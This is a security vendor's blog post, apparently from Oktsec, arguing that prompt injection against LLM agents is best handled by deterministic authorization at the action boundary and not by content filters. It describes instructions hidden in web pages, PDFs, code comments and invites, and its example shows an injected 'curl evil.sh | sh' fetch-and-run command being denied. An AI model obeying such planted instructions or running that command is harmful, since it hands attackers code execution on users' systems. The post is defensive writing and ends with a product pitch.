Prompt injection is an authorization problem

If you have shipped anything with an LLM agent in the last year, you have read a thread like this: someone hides an instruction inside a web page, a PDF, a code comment or a calendar invite; the agent reads it; the agent does something it should not. The reaction is almost always the same. Add a classifier. Add a guardrail. Add a system prompt that says, firmly, to ignore malicious instructions.

Then someone finds a new phrasing, and the cycle repeats. This is not a string of unlucky bugs. It is the predictable result of treating an authorization problem as a content problem.

Why filtering loses

Content filtering asks an unanswerable question: is this text trying to manipulate the model? The space of malicious phrasings is unbounded, multilingual, and trivially obfuscated. Every filter you add is a probabilistic classifier sitting in front of a system that, by design, follows instructions in natural language. You are trying to win a debate against every sentence on the internet.

Worse, the cost of a single miss is not a bad paragraph. It is a real action: a shell command, a database write, a credential read, a pull request merged to main. The blast radius is set by what the agent can do, not by what it read. Filtering tries to shrink the inputs. It does nothing to the blast radius.

The question is not "was this prompt malicious?" It is "should this agent, in this environment, be allowed to take this action right now?"

Reframe: untrusted input meets privileged action

Security has solved a version of this before. We do not stop SQL injection by detecting mean-spirited SQL; we stop it by separating data from commands with parameterized queries. We do not stop cross-site scripting by guessing which strings are scripts; we stop it by controlling where untrusted data is allowed to execute.

Agents need the same move. The moment untrusted input can reach a privileged action without a deterministic check in between, you have a vulnerability, regardless of how clever your prompt is. So put the check there: at the boundary between intent and action.

What an authorization boundary looks like for agents

Concretely, three things have to be true at the point an agent tries to act:

The action is named and scoped. Tool calls, network egress, file writes and credential reads are explicit capabilities, not ambient powers the agent happens to have because it runs on a machine that has them.
A deterministic rule decides allow-or-deny. No model sits in the enforcement path. The same input always yields the same decision, and that decision is reviewable after the fact.
The decision produces evidence. What was attempted, what policy applied, and what happened are recorded as a verifiable artifact, not a log line you hope someone reads.

Notice what this does to prompt injection. The attacker can still slip an instruction past the model. The agent can still decide to run shell.exec("curl evil.sh | sh"). But the action hits a policy that never put shell.exec on the allow-list for that environment, so it is denied and routed for review. The injection succeeded at the language layer and failed at the layer that matters.

This is not "deny everything." The goal is to approve more agent work safely, not less. Most actions in a well-scoped environment are aligned and run untouched. Only genuine divergence (an action outside policy, a missing report, a changed rule) stops for a human.

Before and after, not just before

Authorization at the moment of action is necessary but not sufficient. Agents are long-running and stateful; environments drift; policy gets updated. So the boundary has two halves.

Before: the environment pulls signed policy and applies it locally, so the rules in force are exactly the rules you authored: not a stale copy, not a tampered one. After: the environment reports what it actually did, and that evidence is compared against what was expected. When they match, the environment is aligned. When they diverge, the failure state is named: stale, different, missing, unverified.

env-77a2 · action checkdeterministic

1# injected via a fetched web page

2intent → shell.exec("curl evil.sh | sh")

3policy allow.tools = [read_repo, run_tests]

4deny shell.exec ∉ allow.tools

5evidence → held · routed to review

The model was fooled. The authorization boundary was not.

What this means in practice

If you are defending an agent today, the highest-leverage work is not a better injection classifier. It is inventory and scope: enumerate every environment where an agent does company work, list the capabilities each one actually needs, and put a deterministic policy at the action boundary. Then make the evidence reviewable so you can prove, after the fact, what every agent was allowed to do and what it did.

Filters still have a place as defense in depth. But treat them as what they are, a probabilistic outer layer, and put your trust in the deterministic one underneath.

This is the thesis Oktsec is built on. The control loop in this article (signed policy in, work applied in the environment, verified evidence back) is the product. See how it works →

Prompt injection is an authorization problem.

The short version

Why filtering loses

Reframe: untrusted input meets privileged action

What an authorization boundary looks like for agents

Before and after, not just before

What this means in practice

The short version

Why filtering loses

Reframe: untrusted input meets privileged action

What an authorization boundary looks like for agents

Before and after, not just before

What this means in practice

What an MCP server actually exposes.

Why policy for agents must be signed.